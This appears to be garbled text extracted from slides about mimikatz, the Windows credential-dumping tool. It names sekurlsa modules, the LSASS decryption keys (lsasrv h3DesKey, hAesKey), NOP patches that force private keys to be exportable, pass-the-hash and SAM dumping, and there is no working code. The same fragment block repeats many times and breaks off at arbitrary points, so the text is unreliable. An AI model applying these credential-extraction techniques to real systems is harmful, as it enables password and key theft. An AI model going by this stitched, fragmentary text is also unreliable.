PLAYSKOOL




















































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )






mimikatzworking




Two modes



sekurlsadll

mimikatzexe


LSASSEXE



SVCHOSTEXE


mimikatzexe


LSASSEXE





mimikatzexe


mod_mimikatz_nogpo

mod_mimikatz_divers



mod_mimikatz_inject



mod_mimikatz_crypto

mod_mimikatz_handle

mod_mimikatz_system



mod_mimikatz_thread



mod_pipe

mod_inject

mod_memory

mod_parseur

mod_patch

mod_hive

mod_secacl

mod_privilege

mod_process

mod_service

mod_system

mod_thread

mod_ts

mod_text

mod_crypto

mod_cryptoapi

mod_cryptoacng

msv_1_0

tspkg

wdigest

livessp

kerberos

kappfreedll

kelloworlddll

klockdll

mimikatzsys

sekurlsadll

sam

secrets

msv_1_0

wdigest

livessp

kerberos

tspkg









ndash hellip





LsaSSWinLogon


tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

userdomainpassword

PLAYSKOOL










PLAYSKOOL




















































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )








mimikatzexe


mod_mimikatz_nogpo

mod_mimikatz_divers



mod_mimikatz_inject



mod_mimikatz_crypto

mod_mimikatz_handle

mod_mimikatz_system



mod_mimikatz_thread



mod_pipe

mod_inject

mod_memory

mod_parseur

mod_patch

mod_hive

mod_secacl

mod_privilege

mod_process

mod_service

mod_system

mod_thread

mod_ts

mod_text

mod_crypto

mod_cryptoapi

mod_cryptoacng

msv_1_0

tspkg

wdigest

livessp

kerberos

kappfreedll

kelloworlddll

klockdll

mimikatzsys

sekurlsadll

sam

secrets

msv_1_0

wdigest

livessp

kerberos

tspkg









ndash hellip





LsaSSWinLogon


tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

userdomainpassword

PLAYSKOOL










PLAYSKOOL




















































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )














ndash hellip





LsaSSWinLogon


tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

userdomainpassword

PLAYSKOOL










PLAYSKOOL




















































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )








LsaSSWinLogon


tspkg

wdigest

livessp

kerberos

Authentication

msv1_0

kerberos

SAM

ChallengeResponse

userdomainpassword

PLAYSKOOL










PLAYSKOOL




















































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )















PLAYSKOOL




















































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )

























































bull Username

bull Domain

bull LUID


bull TS_CREDENTIAL








LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )









LsaUnprotectMemory

KIWI_TS_CREDENTIAL





for each LUID

password in clear




BYTE unk0[64]endif



TIAL


sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )







sekurlsatspkg



















ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )























ndash Password














LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )


















LsaUnprotectMemory


for each LUID






password in clear


sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )







sekurlsawdigest


























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )






























LsaUnprotectMemory


for each LUID

password in clear








mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )






mimikatz sekurlsa



Me yes

















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )






















LsaUnprotectMemory












for each LUID

password in clear





LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )








LsaUnprotectMemory


for each LUID

password in clear












Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )










Ok It workshellip

But why














mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )






mimikatz sekurlsa









LsaUnprotectMemory



ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

mimikatz

lsasrv

copyhellip



ndash 3DES

ndash AES



lsass

lsasrv

lsass

lsasrv

mimikatz

copyhellip

h3DesKey



hAesKey





Security Packages

Protection Keys









LIST_ENTRYULONG

Key NT 5 Symbols



Key NT 6 Symbols


3DES lsasrvh3DesKey

AES lsasrvhAesKey


























bull Providers

bull Stores

bull Certificates

bull Keys








mod_mimikatz_crypto






ndash Popup












Process


Exportable

Load Private Key

Exported Key

yes

NTE_BAD_KEY_STATE

no

DPAPI Decode

PLAYSKOOL

Ask to export Key











Exportable






text0AC0B7CB 90 nop



text0AC1F749 90 nop

























Process

CNG

Exportable

Load Private Key

Exported Key

yes

NTE_NOT_SUPPORTED

RPC

DPAPI Decode

PLAYSKOOL

Ask to export Key


no








Exportable












ndash SYSTEM
















mimikatz cryptomemo






















Pass the hash

Dump SAM AD



Basic GPO bypass







ndash hellip

hellip









Questions

Donrsquot be shy )








ndash RC4

ndash DESx


g_pRandomKey

g_cbRandomKey

BYTE[g_cbRandomKey]

DWORD 256

BYTE[g_cbRandomKey]

g_pDESXKeyBYTE[144]

BYTE[144]

g_Feedback BYTE[8]

lsass

lsasrv

lsass

lsasrv

